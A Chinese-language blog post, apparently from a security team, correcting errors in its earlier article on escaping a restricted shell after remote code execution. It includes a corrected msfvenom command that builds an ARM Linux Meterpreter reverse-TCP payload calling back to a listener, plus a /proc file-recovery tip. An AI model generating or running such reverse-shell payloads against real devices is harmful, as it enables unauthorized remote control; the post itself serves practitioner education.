大家好,我们是 NOP Team ,之前我们写了一篇文章 《RCE 遇到受限 shell 的突破》,这篇文章写完后,我们也按照文中说明将撰写过程中测试的设备赠送给了需要的朋友,这篇文章得到了一些反馈,其中指出了两个错误以及一个提醒 尴尬的是,当时微信公众号还没给我们开启留言功能,同时文章只能修改一次,所以一直想等大家意见都收集清楚后,统一发文章说明一下,于是便有了此篇文章 公众号已经开启留言,对文章 《RCE 遇到受限 shell 的突破》的建议、发现的问题等都可以在本篇文章文末处留言讨论~
一、 MSF 生成木马参数错误
0x03 突破受限的shell -> 通过 echo 写文件 -> 1) 生成 Payload 文件 部分存在 Metasploit 木马生成命令错误,将 LHOST 和 LPORT 写成了 RHOST 和 RPORT
此处命令应该替换为
代码语言:javascript复制msfvenom -p linux/armle/meterpreter/reverse_tcp -a armle LHOST=192.168.1.125 LPORT=443 --platform linux -f elf -o payload.elf
导致这部分错误的原因应该是之前测试其他类型的 Payload
,将命令复制过来后,Payload
没用,修改 Payload
后,忘记修改参数
二、 恢复删除文件命令错误
0x02 建立稳定控制 -> 3. Webshell 部分关于恢复被删除的二进制程序这部分描述存在错误
原文中,我们使用 ls -al /proc/331/fd
的方式查找可恢复的二进制程序,这种方法是不全面的,实际上应该直接执行以下命令
cp /proc/331/exe ./tmp/web
这部分错误的原因是知识量不够,好在有师傅私信我,指正了这个错误,这个错误将在下个版本的 《Linux 应急响应手册》中修正
三、提醒
慎用 resetParam
来重置 web 密码,这可能会导致网络参数都初始化,已经有师傅在演练中因为此而导致掉线
有态度,不苟同